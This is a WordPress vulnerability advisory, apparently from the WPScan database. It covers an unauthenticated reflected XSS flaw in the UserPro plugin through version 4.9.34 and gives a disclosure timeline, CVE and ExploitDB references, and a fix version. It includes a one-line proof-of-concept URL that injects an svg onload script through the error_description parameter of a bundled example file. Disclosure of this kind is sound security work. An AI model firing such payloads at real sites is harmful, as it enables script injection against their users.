UserPro <= 4.9.34 - Unauthenticated Reflected XSS



Description
Edit (WPscanTeam):
August 26th, 2019 - Envato Notified
September 2nd, 2019 - v4.9.34 released, still vulnerable
September 24th, 2019 - v4.9.35 and 4.9.35.1 released, fixing the issue
Proof of Concept
/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(/XSS/)%3E

Affects Plugin

fixed in version 4.9.35.1

References

CVE 2019-14470
EXPLOITDB 47304
URL https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 4433
Verified Yes
WPVDB ID 9815

Timeline

Publicly Published 2019-08-25 (7 months ago)
Added 2019-08-26 (7 months ago)
Last Updated 2019-12-02 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin